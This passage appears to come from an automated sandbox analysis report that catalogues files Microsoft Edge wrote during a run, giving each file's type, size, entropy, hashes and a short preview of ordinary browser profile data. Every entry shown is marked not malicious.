                                                                                                                                              SHA1:CB9E261370DCB529B25CEDD3DBE6366CAD641C1C
                                                                                                                                              SHA-256:75295C4A16708331C119A1C958F202EF0ACDB743914D699B5FAD5651C5B6A80E
                                                                                                                                              SHA-512:3C82B09650BA97AE1A02D69E4E0892E80415968EE028EB1FB4AEC378AEE0816E474DD217F7F68D059E0A03B43626DABC122E9305824BCDC10AB6D87087643A7A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12137
                                                                                                                                              Entropy (8bit):5.191769766949962
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hjkx3a88bV+F90XQAkslP9YJ:stMLA3ugso33TbGiXQNsc
                                                                                                                                              MD5:2560E9ECEE22BEACEED07E4CFB7BF632
                                                                                                                                              SHA1:67129DE158AA58016DAC4C81A3A57A26411986E9
                                                                                                                                              SHA-256:49EB580B5968C3BE8C76A610ADAC458E44DCE9F3DC2866A8058ECDC987306331
                                                                                                                                              SHA-512:ABEE95F5AF04DC913F33147BE0AAE52952D1FDA36DEBDE7A4FDC933CD1CF142CF1491FD1D2190EB3285F9FBF3857F6E619F946AC9D4D54339A555D0CA93B27CA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):2163821
                                                                                                                                              Entropy (8bit):5.222870564945937
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:F0PkZpVxfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:F0MZpVxfx2mjF
                                                                                                                                              MD5:D512F892ADA63722ADA095714B530E21
                                                                                                                                              SHA1:C1E90CCD00F0C7A931D38C223DCEE4DD95344240
                                                                                                                                              SHA-256:31CB4B3380C1E3C3EFD98DDF35360620185BF4C8BA1BB65732965F038EADF6A5
                                                                                                                                              SHA-512:2DD907E4F6D1321C85E006322DE217B963A7A090370AF2539C87BF583A68FF8F904D52D4662D1999F78B3B88ED5C43A8ADD4211ECAA1089DE8565DDFD6AA4721
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...m.................DB_VERSION.1...8.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13341056840624329.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):329
                                                                                                                                              Entropy (8bit):5.139132802831949
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEm91N9+q2PRN23oH+Tcwt9Eh1tIFUtfEfHPZZmw5E1pNVkwORN23oH+Tcwt9O:7Vp9V+vaYeb9Eh16FUtf+h/5aV5JYebY
                                                                                                                                              MD5:27141182D5662D5EFBBD73254C828FBB
                                                                                                                                              SHA1:02818AE4971443228E42BEBA43B76973DE491BBA
                                                                                                                                              SHA-256:6CF8E1E7CA73371813AFF0BDBB2993E4AB926FE41AB0B20C6B9B60CC81BDAA36
                                                                                                                                              SHA-512:A1C2BBB51D3844D02A716E42A73F7D212D029413D5D60DD3722541B1AFD370792A58E59F7A40D906939DB637AED5C7EC58867DA75631444B1AE3DF770BF8BC97
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:59.631 b7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/03-11:33:59.632 b7c Recovering log #3.2025/01/03-11:33:59.760 b7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):329
                                                                                                                                              Entropy (8bit):5.139132802831949
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEm91N9+q2PRN23oH+Tcwt9Eh1tIFUtfEfHPZZmw5E1pNVkwORN23oH+Tcwt9O:7Vp9V+vaYeb9Eh16FUtf+h/5aV5JYebY
                                                                                                                                              MD5:27141182D5662D5EFBBD73254C828FBB
                                                                                                                                              SHA1:02818AE4971443228E42BEBA43B76973DE491BBA
                                                                                                                                              SHA-256:6CF8E1E7CA73371813AFF0BDBB2993E4AB926FE41AB0B20C6B9B60CC81BDAA36
                                                                                                                                              SHA-512:A1C2BBB51D3844D02A716E42A73F7D212D029413D5D60DD3722541B1AFD370792A58E59F7A40D906939DB637AED5C7EC58867DA75631444B1AE3DF770BF8BC97
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:59.631 b7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/03-11:33:59.632 b7c Recovering log #3.2025/01/03-11:33:59.760 b7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):28672
                                                                                                                                              Entropy (8bit):0.4653262344726474
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBi:TouQq3qh7z3bY2LNW9WMcUvBi
                                                                                                                                              MD5:BBD2BBF11EE22CE2870A3A50A1EFFE30
                                                                                                                                              SHA1:88EFD954E8AB8920D6C0401E26FFD3856392566F
                                                                                                                                              SHA-256:7EE9B1D441CC864D60547CD473899E9404AF528EB74B3D7824C1AD6895719161
                                                                                                                                              SHA-512:27E64D3C2C8BF2A1CDA7D742B33986862DE3AF31D3CED53BD312CEE221753FF402675DE7E4F0827095F6D5E821AF20B1321416D3AACEC905BB245CCC0DCCCBC5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10240
                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):341
                                                                                                                                              Entropy (8bit):5.1768595956551335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEAQ+q2PRN23oH+TcwtnG2tMsIFUtfESNAdWZmw5ESNAQVkwORN23oH+TcwtnB:7VNQ+vaYebn9GFUtfPAdW/5PAQV5JYeV
                                                                                                                                              MD5:B4AB54B8FF5F68C23CE97E58786D56A0
                                                                                                                                              SHA1:94F5B2F254DC3D291E71F0282D946A305CF99111
                                                                                                                                              SHA-256:A9A2F4840E2AFC40D8E2D56132BA55EECEBD2C0DE93040F29F217EE4BA89016F
                                                                                                                                              SHA-512:3E2B8C8FED15532495D3F0F1A50799D0C6582C2897E90FF473725EF3F902BF27E09D8078AE06B9198FF2C62E851CCBA7AA6A116077DF34F6244C2C87E1D5D0E1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.095 c3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/03-11:33:57.096 c3c Recovering log #3.2025/01/03-11:33:57.096 c3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):341
                                                                                                                                              Entropy (8bit):5.1768595956551335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEAQ+q2PRN23oH+TcwtnG2tMsIFUtfESNAdWZmw5ESNAQVkwORN23oH+TcwtnB:7VNQ+vaYebn9GFUtfPAdW/5PAQV5JYeV
                                                                                                                                              MD5:B4AB54B8FF5F68C23CE97E58786D56A0
                                                                                                                                              SHA1:94F5B2F254DC3D291E71F0282D946A305CF99111
                                                                                                                                              SHA-256:A9A2F4840E2AFC40D8E2D56132BA55EECEBD2C0DE93040F29F217EE4BA89016F
                                                                                                                                              SHA-512:3E2B8C8FED15532495D3F0F1A50799D0C6582C2897E90FF473725EF3F902BF27E09D8078AE06B9198FF2C62E851CCBA7AA6A116077DF34F6244C2C87E1D5D0E1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.095 c3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/03-11:33:57.096 c3c Recovering log #3.2025/01/03-11:33:57.096 c3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):20480
                                                                                                                                              Entropy (8bit):0.6131787107593388
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWarMMAqArec:TLapR+DDNzWjJ0npnyXKUO8+jspkmL
                                                                                                                                              MD5:625802D2E25BDE13B3D8B2CEEE21BFB4
                                                                                                                                              SHA1:180679A56B5F96CD7D732679550ACDD5101B6FB4
                                                                                                                                              SHA-256:109F69BB539397172B76E9A2D0DC01038573DE3E0B02AC3B872DD7D270FB456A
                                                                                                                                              SHA-512:68C5A5B7117E38A2D43372BC394AF086B799BE151CE3F5A35C968A6A39AAD700A861368C956AA98833654190D8CEEF667F1ABD75FF14F3683DAE2152E29CF770
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):375520
                                                                                                                                              Entropy (8bit):5.354118340210205
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:2A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:2FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                              MD5:AC36309C7D6992AF9FC3EC0188D6E142
                                                                                                                                              SHA1:CD6308324B6D22C444D3E01B364873A9848172EE
                                                                                                                                              SHA-256:DC3F5E24DB5ADB6ED6F876110F8972269BADB1EACE494C3E0C0C9E1F1B62CE80
                                                                                                                                              SHA-512:C04A80D279334505DC7B79961A2EA2FBA197F569FEDAAE8B834AC0BB93E87E1E65F5F906EE6BED76C46356AD24749B9A83C9C11DD3B2BC56F8361BB5E168EC03
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...m.................DB_VERSION.1I...q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380395640798251..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16
                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):307
                                                                                                                                              Entropy (8bit):5.208832042014649
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEoXRhRM1RN23oH+Tcwtk2WwnvB2KLlPEQkq2PRN23oH+Tcwtk2WwnvIFUv:7VnHbYebkxwnvFL5ovaYebkxwnQFUv
                                                                                                                                              MD5:B3AEBCE84D42CA05CD02C380FDAA767D
                                                                                                                                              SHA1:D49B252F866A90EFE395927DB9D46C7CD398BD3A
                                                                                                                                              SHA-256:E2D6855500A771BAEA5AE5DA3F339007B72007CA95D0BDA0B69C142D063D6E2F
                                                                                                                                              SHA-512:1E038B5EE9A5AE003F5B9A5EF58E98DEA610A5E35B60962EE02FDA77931BA06EA46DBD35ABC4EF86A343563175E098DBCDC610A4F933C1AFCAF865A98B86ECAE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:59.663 1b74 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/03-11:33:59.695 1b74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41
                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):358860
                                                                                                                                              Entropy (8bit):5.324617829450358
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RQ:C1gAg1zfvY
                                                                                                                                              MD5:9A7F1F4EAC0750031BC9DF2C5C6FF5DC
                                                                                                                                              SHA1:6C76931363FB2E6CC4DA82E56B642A82CCEE85DD
                                                                                                                                              SHA-256:A8FDD46813C6339577C927E1BF17BFC436328EEFC67409011EC200C7B962E363
                                                                                                                                              SHA-512:A424CE4588D06FA0AE24ED9A68BCFAD415B2C6B03C925FF033C74BBDD7E3DA543FFD4E240FC12A6AFB06CDD91FD135C6E13C3E723877EC99B789C9BE16DABB05
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):418
                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.123408893679037
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEr6tq2PRN23oH+Tcwt8aPrqIFUtfErIZmw5ErQkwORN23oH+Tcwt8amLJ:7VDtvaYebL3FUtfj/555JYebQJ
                                                                                                                                              MD5:51AE0146F13AF0989031143075B26BB6
                                                                                                                                              SHA1:6C7D2381DD70B2726BD1B4917E06D0312BB11813
                                                                                                                                              SHA-256:389860A12DAAA1C9B1FD7C01477504CDAAE94337609ED04D2859E480CD18F2E0
                                                                                                                                              SHA-512:0954CFA30E954DE4304000D0F5BB43FD3557A9ED470C5D2B5A9C49999E5995EFDFCFEB2B8B4A508E525792DCD533533995D3DE71B027218B926D3193C422AA80
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.101 a44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/03-11:33:57.102 a44 Recovering log #3.2025/01/03-11:33:57.102 a44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.123408893679037
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEr6tq2PRN23oH+Tcwt8aPrqIFUtfErIZmw5ErQkwORN23oH+Tcwt8amLJ:7VDtvaYebL3FUtfj/555JYebQJ
                                                                                                                                              MD5:51AE0146F13AF0989031143075B26BB6
                                                                                                                                              SHA1:6C7D2381DD70B2726BD1B4917E06D0312BB11813
                                                                                                                                              SHA-256:389860A12DAAA1C9B1FD7C01477504CDAAE94337609ED04D2859E480CD18F2E0
                                                                                                                                              SHA-512:0954CFA30E954DE4304000D0F5BB43FD3557A9ED470C5D2B5A9C49999E5995EFDFCFEB2B8B4A508E525792DCD533533995D3DE71B027218B926D3193C422AA80
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.101 a44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/03-11:33:57.102 a44 Recovering log #3.2025/01/03-11:33:57.102 a44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):418
                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                              Encrypted:false
